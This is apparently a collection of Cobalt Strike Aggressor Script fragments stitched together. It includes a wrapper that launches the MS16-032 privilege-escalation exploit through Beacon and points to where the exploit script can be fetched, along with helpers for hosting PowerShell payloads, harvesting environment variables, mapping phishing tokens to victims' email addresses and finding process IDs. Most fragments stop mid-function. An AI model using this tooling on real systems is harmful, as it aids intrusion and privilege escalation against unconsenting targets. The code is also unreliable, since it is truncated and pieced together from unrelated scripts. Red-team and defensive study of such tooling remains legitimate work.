global('%checkins');

on beacon_checkin {
    local('$last');
    if ($1 in %checkins) {
        $last = %checkins[$1];
        # has it been 1m since the last task acknowledgement?
        if (($3 - $last) > 60000) {

# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
#
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
# 1. grab MS16-032.ps1
#    https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1
# 2. store it with this script
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack

# logic to run this particular attack
sub exploit {

import aggressor.windows.BeaconConsole;
import java.awt.event.ActionEvent;

# $1 = beacon ID
# $2 = command + args to run [as if you typed it in the console]
sub beacon_input_command {
    local('$event');

    # we make the console a static var because each console we create subscribes to a bunch of stuff
    # and requires a manual step [normally performed by a Window close event] to clean up these things.

# host a PowerShell script on a one-off web server via Beacon.
#
# Why? Generate one-liners for length constrained command execution opportunities
#
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
# if there's interest in this capability, I can build an official API for it.

import common.*;
import beacon.*;

#
# safe delete in file browser right-click menu
#
popup_clear("filebrowser");

popup filebrowser {
    item "&Download" {
        local('$file');
        foreach $file ($3) {
            bdownload($1, "$2 $+ \\ $+ $file");

#
# Aggressor Script means to parse/use environment vars in a Beacon session.
#
global('%bvars');

# request environment variables for every new Beacon that comes in.
on beacon_initial {
    # ideally, we'd have a bshell that could take callbacks. We don't have
    # this yet. Eventually though, we will.

#
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
#
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html
#

# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
    local('$out $now $method $uri $addr $ua $response $size $handler $when $params');

# getexplorerpid($bid, &callback);
sub getexplorerpid {
    bps($1, lambda({
        local('$pid $name $entry');
        foreach $entry (split("\n", $2)) {
            ($name, $pid) = split("\\s+", $entry);
            if ($name eq "explorer.exe") {
                # $1 is our Beacon ID, $pid is the PID of explorer.exe
                [$callback: $1, $pid];
            }

# getanypid($bid, $proc, &callback);
# (usage comment corrected from the copied getexplorerpid line; the argument
#  order is assumed from how $proc and $callback are used in the lambda below)
sub getanypid {
    bps($1, lambda({
        local('$pid $name $entry');
        foreach $entry (split("\n", $2)) {
            ($name, $pid) = split("\\s+", $entry);
            if ($name eq $proc) {
                # $1 is our Beacon ID, $pid is the PID of $proc
                [$callback: $1, $proc, $pid];
            }

# demonstrate an example of inversion-of-control with Aggressor Script
#

# co-routine,
sub bot {
    # run pwd and get the output.
    bpwd($bid);
    when("beacon_output_alt", $this);
    yield;